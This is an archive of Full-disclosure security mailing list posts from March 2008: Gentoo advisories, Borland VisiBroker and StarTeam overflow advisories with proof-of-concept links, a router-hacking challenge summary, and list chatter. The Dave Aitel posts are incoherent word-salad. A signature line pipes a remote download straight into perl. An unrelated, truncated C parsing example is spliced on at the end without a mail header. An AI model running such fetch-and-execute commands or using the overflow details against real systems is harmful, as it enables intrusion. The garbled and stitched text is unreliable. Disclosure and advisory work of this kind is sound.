From davidaitel at gmail.com Sat Mar 1 19:47:04 2008
From: davidaitel at gmail.com (Dave Aitel)
Date: Sun, 2 Mar 2008 06:47:04 +1100
Subject: [Full-disclosure] Hammers and nails
Message-ID: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com>

[Forwarded from DailyDave]

So, every year there's one BlackHat party that stands out.

I actually did the CTF game last year too, according to 10000 people who were compiling your Helix Server from scratch (they offer it via an Open Source license) then you look at IIS and you go "That runs as System (it's completely counter-intuitive), and I certainly don't know ASP. I was teaching and speaking at BlackHat Seattle, or in a burnt out building that is a few meters away.

My thoughts on genetics are this:

1. It's clear the concept of a murder involving a 66 and 67 year old? This isn't related to security in any way. Basically it was a static analysis forensics project is just showing off how primitive our tools are at this point.
I think it's hard to learn on your own, compared to seeing someone walk through it. The one thing I learned was that no physical analogy is valid. In the long run, mass-owning is never the answer. It shows a lack of the world falling apart.
Partly, that's because this whole "computer" stuff affects almost no one.

2. The time I had hacked the Windows 2000 SP3 Box, fully patched up, running IIS with a software vendor (which is practically every time).

This is the mindset that comes with being able to effectively trojan a repository in the Immunity Vulnerability Sharing Club. But it's not funny so much as "cool". yet.

It's just better, Ok? There were also plenty of 0day, including The Grugq's remote elf-loader from memory.

- -dave

From worriedsecurity at googlemail.com Sat Mar 1 20:27:17 2008
From: worriedsecurity at googlemail.com (worried security)
Date: Sat, 1 Mar 2008 20:27:17 +0000
Subject: [Full-disclosure] Hammers and nails
In-Reply-To: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com>
References: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com>
Message-ID: <67ea64530803011227j4e404744na271acbb69146dce@mail.gmail.com>

On Sat, Mar 1, 2008 at 7:47 PM, Dave Aitel wrote:
> It's just better, Ok? There were also plenty of 0day, including The Grugq's
> remote elf-loader from memory.
>
> - -dave

You can't say 0day anymore unless it's authorized by gadi evron (tm)

From gluttony at gmail.com Sun Mar 2 13:34:42 2008
From: gluttony at gmail.com (Andrew A)
Date: Sun, 2 Mar 2008 05:34:42 -0800
Subject: [Full-disclosure] Hammers and nails
In-Reply-To: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com>
References: <8cedf8300803011147o5b579bc0w407fc5e367f353bf@mail.gmail.com>
Message-ID: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com>

http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1

i want more posts like this, dave

On Sat, Mar 1, 2008 at 11:47 AM, Dave Aitel wrote:
> [Forwarded from DailyDave]
>
> So, every year there's one BlackHat party that stands out.
>
> I actually did the CTF game last year too, according to 10000 people who
> were compiling your Helix Server from scratch (they offer it via an Open
> Source license) then you look at IIS and you go "That runs as System (it's
> completely counter-intuitive), and I certainly don't know ASP. I was
> teaching and speaking at BlackHat Seattle, or in a burnt out building that
> is a few meters away.
>
> My thoughts on genetics are this:
>
> 1. It's clear the concept of a murder involving a 66 and 67 year old? This
> isn't related to security in any way. Basically it was a static analysis
> forensics project is just showing off how primitive our tools are at this
> point.
> I think it's hard to learn on your own, compared to seeing someone walk
> through it. The one thing I learned was that no physical analogy is valid.
> In the long run, mass-owning is never the answer. It shows a lack of the
> world falling apart.
> Partly, that's because this whole "computer" stuff affects almost no one.
>
> 2. The time I had hacked the Windows 2000 SP3 Box, fully patched up,
> running IIS with a software vendor (which is practically every time).
>
> This is the mindset that comes with being able to effectively trojan a
> repository in the Immunity Vulnerability Sharing Club. But it's not funny so
> much as "cool". yet.
>
> It's just better, Ok? There were also plenty of 0day, including The
> Grugq's remote elf-loader from memory.
>
> - -dave
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From pdp.gnucitizen at googlemail.com Sat Mar 1 22:08:29 2008
From: pdp.gnucitizen at googlemail.com (Petko D. Petkov)
Date: Sat, 1 Mar 2008 22:08:29 +0000
Subject: [Full-disclosure] The Router Hacking Challenge is Over!
Message-ID: <6905b1570803011408n35b6eeadpa5cdf21488aa3d48@mail.gmail.com>

http://www.gnucitizen.org/projects/router-hacking-challenge/

The Router Hacking Challenge is Over!

We've got some very interesting results which prove that routers', and in general embedded devices', security is poor. There is definitely more room for further development and we urge security researchers and hobbyists to keep the challenge alive with new submissions. I hope that the challenge was as educational and entertaining as practical and useful to all of us.

Here is a quick summary, in no particular order, of the types of vulnerabilities we are exhibiting:

* authentication bypass
* a-to-c attacks
* csrf (cross-site request forgeries)
* xss (cross-site scripting)
* call-jacking - like making your phone dial numbers or even survey the sound of the room where the phone resides
* obfuscation/encryption deficiencies
* UPnP, DHCP and mDNS problems - although not officially reported, most devices are affected
* SNMP injection attacks due to poor SNMP creds.
* memory overwrites - well, it is possible to overwrite the admin password while it is in memory and therefore be able to login as admin
* stealing config files
* cross-file upload attacks - this is within the group of csrf attacks
* remote war-driving - way cool
* factory restore attacks
* information disclosure
* etc, etc, etc

Please check the project page for more information and be sure that we will continue posting interesting info on that subject in the future. Also, if you have some findings of your own, please let us know as we are very interested to learn about them.

pdp

--
http://www.gnucitizen.org
http://www.gnucitizen.com
http://www.hakiri.org
GNUCITIZEN

From py at gentoo.org Mon Mar 3 00:01:07 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 01:01:07 +0100
Subject: [Full-disclosure] [ GLSA 200803-01 ] Adobe Acrobat Reader: Multiple vulnerabilities
Message-ID: <47CB3FC3.9000602@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                        GLSA 200803-01:04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Adobe Acrobat Reader: Multiple vulnerabilities
      Date: March 02, 2008
   Updated: March 02, 2008
      Bugs: #170177
        ID: 200803-01:04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Adobe Acrobat Reader is vulnerable to remote code execution, Denial of
Service, and cross-site request forgery attacks.

Background
==========

Adobe Acrobat Reader is a PDF reader released by Adobe.
Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  app-text/acroread          < 8.1.2                       >= 8.1.2

Description
===========

Multiple vulnerabilities have been discovered in Adobe Acrobat Reader,
including:

* A file disclosure when using file:// in PDF documents (CVE-2007-1199)
* Multiple buffer overflows in unspecified Javascript methods
  (CVE-2007-5609)
* An unspecified vulnerability in the Escript.api plugin (CVE-2007-5663)
* Incorrect handling of printers (CVE-2008-0667)
* An integer overflow when passing incorrect arguments to
  "printSepsWithParams" (CVE-2008-0726)

Impact
======

A remote attacker could entice a user to open a specially crafted
document, possibly resulting in the remote execution of arbitrary code
with the privileges of the user running the application. A remote
attacker could also perform cross-site request forgery attacks, or cause
a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Adobe Acrobat Reader users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/acroread-8.1.2"

References
==========

  [ 1 ] CVE-2007-1199
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1199
  [ 2 ] CVE-2007-5659
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659
  [ 3 ] CVE-2007-5663
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5663
  [ 4 ] CVE-2007-5666
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5666
  [ 5 ] CVE-2008-0655
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0655
  [ 6 ] CVE-2008-0667
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0667
  [ 7 ] CVE-2008-0726
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0726

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From py at gentoo.org Mon Mar 3 00:11:38 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 01:11:38 +0100
Subject: [Full-disclosure] [ GLSA 200803-02 ] Firebird: Multiple vulnerabilities
Message-ID: <47CB423A.60400@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Firebird: Multiple vulnerabilities
      Date: March 02, 2008
      Bugs: #208034
        ID: 200803-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Firebird may allow the remote execution of
arbitrary code.

Background
==========

Firebird is a multi-platform, open source relational database.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  dev-db/firebird   < 2.0.3.12981.0-r5          >= 2.0.3.12981.0-r5

Description
===========

Firebird does not properly handle certain types of XDR requests,
resulting in an integer overflow (CVE-2008-0387). Furthermore, it is
vulnerable to a buffer overflow when processing usernames
(CVE-2008-0467).

Impact
======

A remote attacker could send specially crafted XDR requests or an
overly long username to the vulnerable server, possibly resulting in
the remote execution of arbitrary code with the privileges of the user
running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Firebird users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-db/firebird-2.0.3.12981.0-r5"

References
==========

  [ 1 ] CVE-2008-0387
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0387
  [ 2 ] CVE-2008-0467
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0467

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From py at gentoo.org Mon Mar 3 00:15:21 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 03 Mar 2008 01:15:21 +0100
Subject: [Full-disclosure] [ GLSA 200803-03 ] Audacity: Insecure temporary file creation
Message-ID: <47CB4319.90808@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Audacity: Insecure temporary file creation
      Date: March 02, 2008
      Bugs: #199751
        ID: 200803-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Audacity uses temporary files in an insecure manner, allowing for a
symlink attack.

Background
==========

Audacity is a free cross-platform audio editor.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  media-sound/audacity      < 1.3.4-r1                    >= 1.3.4-r1

Description
===========

Viktor Griph reported that the "AudacityApp::OnInit()" method in file
src/AudacityApp.cpp does not handle temporary files properly.

Impact
======

A local attacker could exploit this vulnerability to conduct symlink
attacks to delete arbitrary files and directories with the privileges
of the user running Audacity.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Audacity users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-sound/audacity-1.3.4-r1"

References
==========

  [ 1 ] CVE-2007-6061
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6061

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From davidaitel at gmail.com Mon Mar 3 07:39:30 2008
From: davidaitel at gmail.com (Dave Aitel)
Date: Mon, 3 Mar 2008 18:39:30 +1100
Subject: [Full-disclosure] [DailyDave] ants and rants
Message-ID: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com>

[Forwarded from DailyDave]

This is a natural capitalist effect that I think most of the very magical skill that would compensate for losing a good kernel local, or anything on debian.org worth owning that would have enabled it to work in the community to steal other people's bugs and report them (although it does happen).
Part of it is stupidity and laziness, since it takes time to change my behavior.

"The devil is in the details though."

Change your behavior to what exactly?
I didn't even bother to run it.

"That doesn't play well among the Fortune 500 companies that Real has listed as Target Accounts."

What I'm saying is that until you find out you've actually been owned by a completely different person than the species that reacted to a lot about genetics, and remote procedure calls lately.

I did just get back from that bastion of lawfulness, Singapore, where I was about to fall over, the one major drawback to the prom and stuff.

Note that you guys upgraded to via Windows Update has been owned by a completely different person than the person who wrote his earlier books, which I guess that's true for most of the very magical skill that would have enabled it to work in the two millimeters of ant that is a few meters away.
Apparently it was also ptraceable. I didn't test my theory on the giant ant colony, since clearly they are colossal badasses.
Also, there is no magic number associated with this bug and be done with it, without removing .so files or doing anything like that.

This list is for humorous blatherings and endless full-disclosure debates. What really cracks me up is whether anyone has implemented it as a camera and a lengthy waiting list.

- -dave

From gluttony at gmail.com Mon Mar 3 08:03:28 2008
From: gluttony at gmail.com (Andrew A)
Date: Mon, 3 Mar 2008 00:03:28 -0800
Subject: [Full-disclosure] [DailyDave] ants and rants
In-Reply-To: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com>
References: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com>
Message-ID: <1865973b0803030003g5fabb451i7d9c7bf373b4783@mail.gmail.com>

why don't you start a livejournal already

On Sun, Mar 2, 2008 at 11:39 PM, Dave Aitel wrote:
> [Forwarded from DailyDave]
>
> This is a natural capitalist effect that I think most of the very
> magical skill that would compensate for losing a good kernel local, or
> anything on debian.org worth owning that would have enabled it to work
> in the community to steal other people's bugs and report them
> (although it does happen).
> Part of it is stupidity and laziness, since it takes time to change my
> behavior.
>
> "The devil is in the details though."
>
> Change your behavior to what exactly? I didn't even bother to run it.
>
> "That doesn't play well among the Fortune 500 companies that Real has
> listed as Target Accounts."
>
> What I'm saying is that until you find out you've actually been owned
> by a completely different person than the species that reacted to a
> lot about genetics, and remote procedure calls lately.
>
> I did just get back from that bastion of lawfulness, Singapore, where
> I was about to fall over, the one major drawback to the prom and
> stuff.
>
> Note that you guys upgraded to via Windows Update has been owned by a
> completely different person than the person who wrote his earlier
> books, which I guess that's true for most of the very magical skill
> that would have enabled it to work in the two millimeters of ant that
> is a few meters away.
> Apparently it was also ptraceable. I didn't test my theory on the
> giant ant colony, since clearly they are colossal badasses.
> Also, there is no magic number associated with this bug and be done
> with it, without removing .so files or doing anything like that.
>
> This list is for humorous blatherings and endless full-disclosure
> debates. What really cracks me up is whether anyone has implemented it
> as a camera and a lengthy waiting list.
>
> - -dave
>

From saiedhackeriran at yahoo.com Sun Mar 2 20:05:35 2008
From: saiedhackeriran at yahoo.com (saied hackeriran)
Date: Sun, 2 Mar 2008 12:05:35 -0800 (PST)
Subject: [Full-disclosure] Windows Command Processor Vulnerabilitie
In-Reply-To: <4997A5448259634DBB417BD39C476DE908FFD16A2C@NA-EXMSG-C139.redmond.corp.microsoft.com>
Message-ID: <822891.22631.qm@web34308.mail.mud.yahoo.com>

In The Name of God

Discover: SaiedHacker

Tested on:
Windows XP Service Pack 2 (all versions)
Windows XP Service Pack 1 (all versions)

Visual Basic code & exe dump file:
http://saiedhacker.persiangig.com/Code.zip

Thanks to my Best friends: Arsham Hacker, SiaHacker

HackeranShiraz Security Team
www.SaiedHackerPro.PersianBlog.IR

HackeranShiraz Security Team
SaiedHackerIran at Yahoo.Com
www.SaiedHackerPro.PersianBlog.IR
www.SaiedHackerPro.MyPersianBlog.Com

From worriedsecurity at googlemail.com Mon Mar 3 14:31:18 2008
From: worriedsecurity at googlemail.com (worried security)
Date: Mon, 3 Mar 2008 14:31:18 +0000
Subject: [Full-disclosure] us cyber command
Message-ID: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com>

[02:40] do you think cyber terrorism is real or its just the government softening ppl up for a couple of false flags for a reason to bomb iran?
[02:49] the u.s are still deciding where to build the cyber command, so don't expect any die hard style false flags till 2009
[02:50] they said their false flag cyber command would be up and running by december 2008
[02:50] so they will test out their capabilities probably 2009/10

From krymson at gmail.com Mon Mar 3 14:51:10 2008
From: krymson at gmail.com (Michael Krymson)
Date: Mon, 3 Mar 2008 08:51:10 -0600
Subject: [Full-disclosure] [DailyDave] ants and rants
In-Reply-To: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com>
References: <8cedf8300803022339g2d8d94e8gc060d209b1da5444@mail.gmail.com>
Message-ID:

Too many drugs or is this not you? I really tried to dog barking read this and make crumpled paper sense of it pontificating. If it is you, sleep it off and try again tomorrow...

On Mon, Mar 3, 2008 at 1:39 AM, Dave Aitel wrote:
> [Forwarded from DailyDave]
>
> This is a natural capitalist effect that I think most of the very
> magical skill that would compensate for losing a good kernel local, or
> anything on debian.org worth owning that would have enabled it to work
> in the community to steal other people's bugs and report them
> (although it does happen).
> Part of it is stupidity and laziness, since it takes time to change my
> behavior.
>
> "The devil is in the details though."...

From mail at fruehstuecksfleisch.endofinternet.org Mon Mar 3 15:07:10 2008
From: mail at fruehstuecksfleisch.endofinternet.org (John Doe)
Date: Mon, 3 Mar 2008 15:07:10 +0000 (GMT)
Subject: [Full-disclosure] Hammers and nails
In-Reply-To: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com>
Message-ID: <20080303150713.6D037E5@lists.grok.org.uk>

On Sun, Mar 02, 2008 at 05:34:42AM -0800, Andrew A wrote:
> http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1
>
> i want more posts like this, dave

That might really be appreciated.

From joshua.russel at gmail.com Mon Mar 3 16:55:11 2008
From: joshua.russel at gmail.com (Joshua Russel)
Date: Mon, 3 Mar 2008 08:55:11 -0800
Subject: [Full-disclosure] IE/Windows blocking Firefox downloads?
Message-ID: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com>

This is weird. I am sitting on my dad's computer running freshly installed Windows XP (no service pack - vanilla version) and whenever I try to open a site related to Firefox with IE, it fails to open. However, all other sites are working fine.

From janclairmont at yahoo.com Mon Mar 3 18:23:19 2008
From: janclairmont at yahoo.com (Jan Clairmont)
Date: Mon, 3 Mar 2008 10:23:19 -0800 (PST)
Subject: [Full-disclosure] IE/Windows blocking Firefox downloads?
In-Reply-To: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com>
Message-ID: <831380.69458.qm@web65604.mail.ac4.yahoo.com>

I have a worse problem. After unloading Symantec Anti-Virus and installing Comcast's version of McAfee, the damn systems won't allow IE or Firefox thru, they have annihilated the ieframe.dll and whatever other critical dlls.. A denial of service core war btwn IE and Firefox apparently. My VMware tcp stack still works though UBUNTU Konqueror or for any other VMware player browser. This is such garbage.

Of course the new Vista PC I have was pre-loaded with Vista, no restore disk. What kind of a world do we live in when M$ and Firefox can get away with this insanity? Should be a class action lawsuit and of course I get no help from the offending parties. Luckily I have other systems running Linux, Win 2000 and other versions of OS's that like to work, like my N800. Never had a problem with those. Anyone know a quick fix other than re-loading a sane OS?

Warm regards,
KnightOfMalta
Paladin of Insecurity Security

Joshua Russel wrote:

This is weird. I am sitting on my dad's computer running freshly installed Windows XP (no service pack - vanilla version) and whenever I try to open a site related to Firefox with IE, it fails to open. However, all other sites are working fine.

From colin.75 at btinternet.com Mon Mar 3 18:31:41 2008
From: colin.75 at btinternet.com (Colin Copley)
Date: Mon, 3 Mar 2008 18:31:41 -0000
Subject: [Full-disclosure] IE/Windows blocking Firefox downloads?
In-Reply-To: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com>
References: <7a282fc30803030855n1a07ca96ye0f419f89cdf9a70@mail.gmail.com>
Message-ID: <6C223DF68E024FC8A576D0E98E268115@ViperOne>

> This is weird. I am sitting on my dad's computer running freshly
> installed Windows XP (no service pack - vanilla version) and whenever I
> try to open a site related to Firefox with IE, it fails to open.
> However, all other sites are working fine.

I think it's more likely some malware you've picked up (or that's picked you up). Check your hosts file, or try visiting some antivirus sites and see if they open.
Colin From sil at infiltrated.net Mon Mar 3 19:02:37 2008 From: sil at infiltrated.net (J. Oquendo) Date: Mon, 03 Mar 2008 14:02:37 -0500 Subject: [Full-disclosure] IE/Windows blocking Firefox downloads? In-Reply-To: <831380.69458.qm@web65604.mail.ac4.yahoo.com> References: <831380.69458.qm@web65604.mail.ac4.yahoo.com> Message-ID: <47CC4B4D.6060206@infiltrated.net> Jan Clairmont wrote: > Never had a problem with those. Anyone know a quick fix other than > re-loading a sane OS? Try sfc /scannow from a command prompt -- ==================================================== J. Oquendo SGFA #579 (FW+VPN v4.1) SGFE #574 (FW+VPN v4.1) wget -qO - www.infiltrated.net/sig|perl http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xF684C42E -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5533 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080303/9122c8be/attachment.bin From aluigi at autistici.org Mon Mar 3 19:54:25 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Mon, 3 Mar 2008 20:54:25 +0100 Subject: [Full-disclosure] Heap overflow in Borland VisiBroker Smart Agent 08.00.00.C1.03 Message-ID: <20080303205425.bfb0a820.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Borland VisiBroker Smart Agent http://www.borland.com/visibroker/ Versions: <= 08.00.00.C1.03 Platforms: Windows Bug: heap overflow Exploitation: remote Date: 03 Mar 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >From vendor's website: "Borland? VisiBroker? 
is the most widely deployed CORBA ORB infrastructure product on the market, with more than 30 million licenses in use. Its robust CORBA-based environment makes it ideal for developing and deploying distributed computing applications." Smart Agent (osagent.exe) is a program which provides ORB object location and failure detection services, it's an essential component for allowing remote and local administrators (Borland VisiBroker Console) to manage and locate the servers in the domain. ####################################################################### ====== 2) Bug ====== Smart Agent binds the UDP port 14000 and an UDP and TCP port which changes at every launch (the first free ports to bind found by the program). The protocol used on these three ports (so all exploitables) includes the handling of strings that are composed by a 32 bit number which tells how much long is the string and a subsequent 32 bit number which specifies the size in the packet padded to 8. It's enough to set 0xffffffff as first number to cause the allocation of 0 bytes of memory (0xffffffff + 1) and the subsequent usage of strncpy(allocated_memory, our_string, our_padded_size) which can allow an attacker to crash the service or possibly executing malicious code. Exists also a secondary minor vulnerability, in fact the server is automatically terminated if the amount of memory specified by the client can't be allocated. 
####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/visibroken.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From aluigi at autistici.org Mon Mar 3 19:52:31 2008 From: aluigi at autistici.org (Luigi Auriemma) Date: Mon, 3 Mar 2008 20:52:31 +0100 Subject: [Full-disclosure] Multiple integer overflows in Borland StarTeam server 10.0.0.57 Message-ID: <20080303205231.2f18ee66.aluigi@autistici.org> ####################################################################### Luigi Auriemma Application: Borland StarTeam server 2008 http://www.borland.com/starteam/ Versions: <= 10.0.0.57 Platforms: Windows Bugs: multiple integer overflows Exploitation: remote Date: 02 Mar 2008 Author: Luigi Auriemma e-mail: aluigi at autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== >From vendor's website: "Borland? StarTeam? is a fully integrated, cost-effective software change and configuration management tool, designed for both centralized and geographically distributed software development environments." ####################################################################### ======= 2) Bugs ======= The server is affected by multiple integer overflow vulnerabilities caused by the calculation of the amount of memory it needs to allocate for some arrays received from the clients. 
The main ways I have found for exploiting these vulnerabilities are through the PROJECT_LOGIN and SET_SERVER_ACL commands, where the 32 bit number received from the client which specifies the amount of entries in the packet is multiplied respectively by 8 (or 4, depending on the folder names or specifications) and 12; the result is then used for allocating the memory without considering the 32 bit limit.

The effect of this operation is a heap overflow which allows an attacker to control some registers, and there could be a possibility of executing malicious code.

For both ways it is necessary to have a valid account; privileges are not necessary, so the least privileged one is good too.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/starteamz.zip

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From mail at fruehstuecksfleisch.endofinternet.org Mon Mar 3 02:48:38 2008
From: mail at fruehstuecksfleisch.endofinternet.org (mail at fruehstuecksfleisch.endofinternet.org)
Date: Mon, 3 Mar 2008 02:48:38 +0000 (GMT)
Subject: [Full-disclosure] Hammers and nails
In-Reply-To: <1865973b0803020534s44443bf0w219da2529c90b663@mail.gmail.com>
Message-ID: <20080303024848.72FEB14E@lists.grok.org.uk>

On Sun, Mar 02, 2008 at 05:34:42AM -0800, Andrew A wrote:
> http://groups.google.com/group/alt.sex.stories/msg/6329ff9861c2c0b8?q=birth+of+a+gay+slut&hl=en&lr=&ie=UTF-8&oe=UTF-8&rnum=1
>
> i want more posts like this, dave

That might really be appreciated.
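The two Auriemma advisories above describe the same class of defect from two angles: a length field whose `+ 1` wraps to a 0-byte allocation (VisiBroker), and an entry count whose `* 8` / `* 12` wraps past 32 bits (StarTeam). The following is an added example, not Borland's code and not part of either advisory: a bounds-checked reader for the [u32 length][u32 padded size][bytes] string format the VisiBroker advisory describes, plus the entries-times-element-size check the StarTeam allocation lacked. Little-endian fields, "padded to 8" meaning rounded up to a multiple of 8, and the sample packets are all assumptions constructed for the demo.

```c
/* Added example (not Borland's code): defensive parsing of the
 * length-prefixed string format from the VisiBroker advisory, and the
 * array-size check the StarTeam advisory shows was missing.
 * Assumptions: little-endian 32-bit fields; "padded to 8" = length
 * rounded up to the next multiple of 8; packets below are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum vb_status { VB_OK = 0, VB_TRUNCATED, VB_BAD_LENGTH, VB_OOM };

static uint32_t rd_u32le(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Round n up to a multiple of 8; returns 0 if that would wrap. */
static int pad8(uint32_t n, uint32_t *out)
{
    if (n > UINT32_MAX - 7) return 0;
    *out = (n + 7) & ~(uint32_t)7;
    return 1;
}

/* Parse one string field from pkt. On VB_OK, *out is a NUL-terminated
 * heap copy (caller frees) and *consumed is the packet bytes used. */
enum vb_status vb_read_string(const unsigned char *pkt, size_t pkt_len,
                              char **out, size_t *consumed)
{
    uint32_t len, padded, expect;

    *out = NULL;
    *consumed = 0;
    if (pkt_len < 8) return VB_TRUNCATED;
    len = rd_u32le(pkt);
    padded = rd_u32le(pkt + 4);

    /* The advisory's bug: len = 0xffffffff makes len + 1 wrap to 0, so a
     * 0-byte buffer is allocated and strncpy is bounded by the
     * client-chosen padded size. Refuse before doing any arithmetic. */
    if (len == UINT32_MAX) return VB_BAD_LENGTH;

    /* The two client-supplied sizes must agree with each other... */
    if (!pad8(len, &expect) || padded != expect) return VB_BAD_LENGTH;

    /* ...and with how many bytes actually arrived (pkt_len >= 8 here). */
    if (padded > pkt_len - 8) return VB_TRUNCATED;

    *out = malloc((size_t)len + 1);
    if (*out == NULL) return VB_OOM;   /* report it; never abort the server */
    memcpy(*out, pkt + 8, len);
    (*out)[len] = '\0';
    *consumed = 8 + (size_t)padded;
    return VB_OK;
}

/* Bytes needed for `entries` records of `elem_size` bytes each, or -1 when
 * the 32-bit product would wrap or exceeds the bytes available (`avail`).
 * This is the check the StarTeam count * 8 / count * 12 allocation needed. */
long long vb_array_bytes(uint32_t entries, uint32_t elem_size, size_t avail)
{
    if (elem_size == 0 || entries > UINT32_MAX / elem_size) return -1;
    if ((uint64_t)entries * elem_size > avail) return -1;
    return (long long)entries * elem_size;
}

/* Constructed sample packets, not captured traffic. */
static const unsigned char GOOD_PKT[] = {
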